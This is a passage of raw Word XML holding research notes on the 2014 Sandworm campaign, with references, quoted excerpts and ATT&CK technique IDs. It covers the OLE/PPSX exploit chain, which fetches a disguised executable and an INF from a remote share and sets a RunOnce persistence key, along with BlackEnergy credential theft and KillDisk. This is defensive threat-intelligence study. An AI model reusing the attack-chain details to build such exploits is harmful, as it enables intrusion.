      </w:r>
    </w:p>
    <w:p w14:paraId="4CC612B3" w14:textId="76471050" w:rsidR="00230FE4" w:rsidRDefault="00230FE4" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:anchor=":~:text=The%20vulnerability%20allows%20an%20attacker,user%20on%20the%20target%20machine." w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Windows OLE RCE - The Sandworm Exploit (controlcase.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8010A">
        <w:t xml:space="preserve">[2014] </w:t>
      </w:r>
      <w:r>
        <w:t>(via Google)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8FE3E" w14:textId="7E14FD26" w:rsidR="003957FE" w:rsidRDefault="003957FE" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Windows OLE RCE Exploit MS14-060 (CVE-2014-4114) - Sandworm - Security </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SiftSecurity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Sift</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8010A">
        <w:t xml:space="preserve">[2014] </w:t>
      </w:r>
      <w:r>
        <w:t>(via Google)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A56A13" w14:textId="0C78860A" w:rsidR="004B6F64" w:rsidRDefault="005128DF" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Russian malware used by 'privateer' hackers against Ukrainian government | Technology | The Guardian (archive.org)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E8010A">
        <w:t xml:space="preserve"> [2015]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150925B8" w14:textId="05B486D3" w:rsidR="00DD4A99" w:rsidRDefault="00DD4A99" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:hyperlink r:id="rId175" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BlackEnergy</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0089 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E8010A">
        <w:t xml:space="preserve"> [2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB3FFD" w14:textId="6962B8F8" w:rsidR="00DD4A99" w:rsidRDefault="00DD4A99" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[10] </w:t>
      </w:r>
      <w:hyperlink r:id="rId176" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BlackEnergy</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> &amp; </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Quedagh</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>: The convergence of crimeware and APT attacks (f-secure.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E8010A">
        <w:t xml:space="preserve"> [2016]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884340F" w14:textId="77777777" w:rsidR="004B6F64" w:rsidRDefault="004B6F64" w:rsidP="00706361"/>
    <w:p w14:paraId="75CF4176" w14:textId="61B6E03A" w:rsidR="00833514" w:rsidRDefault="001E2EDA" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> campaign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC50C8D" w14:textId="78E1CAE4" w:rsidR="001E2EDA" w:rsidRDefault="001E2EDA" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2EDA">
        <w:t>On September 3rd, our research and labs teams discovered that the spear-phishing attacks relied on the exploitation of a zero-day vulnerability impacting all supported versions of Microsoft Windows (XP is not impacted) and Windows Server 2008 and 2012. A weaponized PowerPoint document was observed in these attacks.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00F81F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F81F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F81F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F81F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F81F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002 : User Execution : Malicious File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F81F17" w:rsidRPr="00F81F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1203 : Exploitation for Client Execution</w:t>
      </w:r>
      <w:r w:rsidR="00F81F17">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C3B67" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:r>
        <w:t>[2] Visible Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F856793" w14:textId="7FDDE730" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:r>
        <w:t>Visibility into this campaign indicates targeting across the following domains. It is critical to note that visibility is limited and that there is a potential for broader targeting from this group (and potentially other threat actors) using this zero-day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE34D11" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1056C5" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ukrainian government organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDBC5B" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Western European government organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F9B0B" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Energy Sector firms (specifically in Poland)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BC060" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00E01554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>European telecommunications firms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931889D" w14:textId="374FF260" w:rsidR="00E01554" w:rsidRDefault="00E01554" w:rsidP="00A84ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>United States academic organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6AF4B5" w14:textId="55CCECA3" w:rsidR="00432DB4" w:rsidRDefault="00432DB4" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="004B6F64">
        <w:t>When exploited, the vulnerability allows an attacker to remotely execute arbitrary code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430265FD" w14:textId="1829D82E" w:rsidR="00962FD1" w:rsidRDefault="00962FD1" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00962FD1">
        <w:t>Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185727B8" w14:textId="235FFB8D" w:rsidR="00230FE4" w:rsidRDefault="00230FE4" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="00230FE4">
        <w:t>An attacker who successfully exploited this vulnerability could assume the role of the current user on the target machine</w:t>
      </w:r>
      <w:r w:rsidR="004E787E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52082040" w14:textId="20CDF67B" w:rsidR="00A5536D" w:rsidRDefault="00A5536D" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidR="004E787E" w:rsidRPr="004E787E">
        <w:t>This recent exploit (dubbed “Sandworm”) took advantage of a vulnerability in which a specially crafted OLE object could allow remote code execution. In the case of the live sample exploit PPSX file I examined, it automatically downloaded the payload from a remote SMB share</w:t>
      </w:r>
      <w:r w:rsidR="004E787E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18758A34" w14:textId="64F171D7" w:rsidR="00A84ECC" w:rsidRDefault="00A84ECC" w:rsidP="00706361">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A84ECC">
        <w:t xml:space="preserve">The team has recently used multiple exploit methods to trap its targets including the use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A84ECC">
        <w:t>BlackEnergy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A84ECC">
        <w:t xml:space="preserve"> crimeware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FEC59" w14:textId="77777777" w:rsidR="00686154" w:rsidRDefault="00686154" w:rsidP="00686154">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>First, the PPSX file contains two binary OLE object binary files (oleObject1.bin and oleObject2.bin) that (thanks to the vulnerability) are able to define content to retrieve from a remote share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FAE7AE" w14:textId="77777777" w:rsidR="00686154" w:rsidRPr="00686154" w:rsidRDefault="00686154" w:rsidP="00686154">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidRPr="00686154">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Each is responsible for downloading one of the following two files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5596AD6A" w14:textId="77777777" w:rsidR="00686154" w:rsidRPr="00686154" w:rsidRDefault="00686154" w:rsidP="00686154">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686154">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A malicious executable, posing as a GIF (slide1.gif).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087A5FC" w14:textId="77777777" w:rsidR="00686154" w:rsidRPr="00686154" w:rsidRDefault="00686154" w:rsidP="00686154">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00686154">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>An INF file (slides.inf) that, when retrieved and executed, will rename the retrieved GIF to EXE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF76C4B" w14:textId="0C600F95" w:rsidR="00686154" w:rsidRDefault="00686154" w:rsidP="00686154">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>INF contains “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00686154">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>HKLM,Software</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00686154">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4280BF" w14:textId="7E52135F" w:rsidR="00E0086E" w:rsidRDefault="00E0086E" w:rsidP="00686154">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="749A1D38" w14:textId="2E295613" w:rsidR="00686154" w:rsidRDefault="00E0086E" w:rsidP="00706361">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0086E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The malware can scoop up reams of information from victims’ PCs, including passwords and system information. “The nature of the information being gathered seems to be generic rather than targeted. This may be because the malware has roots from crimeware,” F-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E0086E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Secure’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E0086E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> report read. “The information is still useful however as such data makes it easier for the gang to plan any further attacks on the same targets.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7D89E" w14:textId="7D9D9B08" w:rsidR="00DD4A99" w:rsidRDefault="00DD4A99" w:rsidP="00706361">
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD4A99">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>BlackEnergy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD4A99">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> communicates with its C2 server over HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D97C3B" w14:textId="41E5DE54" w:rsidR="00EE3D49" w:rsidRDefault="003A0981" w:rsidP="00706361">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BE5FA6">
        <w:t xml:space="preserve">(  </w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6" w:rsidRPr="002266EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BE5FA6" w:rsidRPr="002266EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Input Capture: Keylogging</w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6">
        <w:t xml:space="preserve"> ) ( </w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6" w:rsidRPr="00BE5FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1485 Data Destruction</w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6">
        <w:t xml:space="preserve"> ) ( </w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6" w:rsidRPr="00BE5FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1529 System Shutdown/Reboot</w:t>
      </w:r>
      <w:r w:rsidR="00BE5FA6">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1138968C" w14:textId="32E4602C" w:rsidR="003A0981" w:rsidRDefault="003A0981" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA9198" w14:textId="6E890D7F" w:rsidR="00BE5FA6" w:rsidRDefault="00BE5FA6" w:rsidP="00706361">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00DF09BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF09BC" w:rsidRPr="00DF09BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DF09BC" w:rsidRPr="00DF09BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DF09BC" w:rsidRPr="00DF09BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C31BD" w14:textId="7E4A56D7" w:rsidR="00BE5FA6" w:rsidRDefault="00BE5FA6" w:rsidP="00706361"/>
    <w:p w14:paraId="6E847483" w14:textId="04F274AA" w:rsidR="00EE3D49" w:rsidRDefault="00EE3D49" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5363807D" w14:textId="2949C4B6" w:rsidR="001136EB" w:rsidRDefault="001136EB" w:rsidP="00706361">
      <w:r>
        <w:t>[3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C347D" w14:textId="6472494A" w:rsidR="001136EB" w:rsidRDefault="001136EB" w:rsidP="00706361"/>
    <w:p w14:paraId="7FA106AB" w14:textId="3479CC6A" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="00706361">
      <w:r>
        <w:t>[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4EFB8" w14:textId="77777777" w:rsidR="002266EB" w:rsidRPr="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002266EB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">GRU’s Main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002266EB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002266EB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Special Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D6691" w14:textId="77777777" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">Overview: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or Unit 74455, is an APT group that has operated since at least 2009 and has targeted a variety of critical infrastructure organizations, including those in the Energy, Transportation Systems, and Financial Services Sectors. According to industry reporting, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> also has an extensive history of conducting cyber espionage as well as destructive and disruptive operations against NATO member states, Western government and military organizations, and critical infrastructure-related organizations, including in the Energy Sector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C4CB46" w14:textId="77777777" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB"/>
    <w:p w14:paraId="05B72D5A" w14:textId="42F51238" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] The primary distinguishing characteristic of the group is its operations use techniques aimed at causing disruptive or destructive effects at targeted organizations using DDoS attacks or wiper malware. The group’s destructive operations have also leveraged wiper malware that mimics ransomware or hacktivism and can result in collateral effects to organizations beyond the primary intended targets. Some of their disruptive operations have shown disregard or ignorance of potential secondary or tertiary effects. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F537EE7" w14:textId="77777777" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB"/>
    <w:p w14:paraId="21386060" w14:textId="50C09A1F" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] High-Profile Activity: the malicious activity below has been previously attributed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by the U.S. Government and the UK Government.[19][20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD61167" w14:textId="77777777" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB"/>
    <w:p w14:paraId="51665DAE" w14:textId="6FD41F28" w:rsidR="002266EB" w:rsidRDefault="00A1238F" w:rsidP="002266EB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> actors conducted a cyberattack against Ukrainian energy distribution companies in December 2015, leading to disruption of multiple companies’ operations and widespread temporary outages. The actors deployed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>BlackEnergy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> malware to steal user credentials </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">(  </w:t>
      </w:r>
      <w:r w:rsidR="002266EB" w:rsidRPr="002266EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002266EB" w:rsidRPr="002266EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Input Capture: Keylogging</w:t>
      </w:r>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> ) and used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>BlackEnergy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> destructive component, KillDisk, to make infected computers inoperable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24BE11" w14:textId="61BE1181" w:rsidR="002266EB" w:rsidRDefault="00A1238F" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
